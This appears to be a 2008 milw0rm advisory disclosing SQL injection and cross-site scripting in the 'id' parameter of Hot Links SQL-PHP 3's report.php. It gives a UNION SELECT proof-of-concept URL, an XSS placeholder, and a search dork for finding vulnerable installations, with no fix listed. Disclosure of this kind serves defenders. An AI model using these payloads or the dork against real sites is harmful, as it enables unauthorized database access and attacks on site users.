###########################################################
#
# ___ __ __ __ __
# /\_ \ /\ \\ \ /\ \/\ \
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/
#
# security breakd0wn!
###########################################################
#
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
# Vendor: http://www.mrcgiguy.com
# Vulnerable Version: 3 and prior versions
# Fix: N/A
#
###########################################################
#
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "Powered By: Hot Links SQL-PHP 3"
# stop lammo
#
###########################################################
######################
1. Information
######################
Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.
######################
2. Vulnerabilities
######################
SQL Injection in "report.php" in the "id" parameter.
Cross Site Scripting in "report.php" in the "id" parameter.
######################
3. PoC
######################
http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
http://localhost/path/report.php?id=[XSS]
###########################################################
# milw0rm.com [2008-09-09]